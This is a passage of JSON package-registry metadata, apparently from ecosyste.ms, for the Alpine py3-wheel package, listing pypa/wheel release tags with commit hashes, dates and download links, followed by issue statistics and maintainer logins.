1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:26.034Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.20","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-wheel/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter 